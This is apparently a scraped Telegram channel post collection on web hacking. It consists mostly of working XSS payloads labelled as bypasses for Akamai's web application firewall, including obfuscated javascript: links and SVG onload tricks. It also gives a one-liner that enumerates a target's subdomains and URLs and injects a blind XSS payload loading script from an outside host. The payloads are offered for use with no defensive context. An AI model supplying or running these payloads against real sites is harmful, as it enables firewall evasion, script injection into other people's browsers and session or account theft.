SSRF
Web Hacking pinned ยซhttps://xn--r1a.website/bug_bounty_bootcampยป
Akamai WAF bypass

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
๐Ÿ‘4๐Ÿ‘Œ1
Another one


"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
๐Ÿ‘1
One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Testing Authentication Flaws in Web Application
๐Ÿ‘1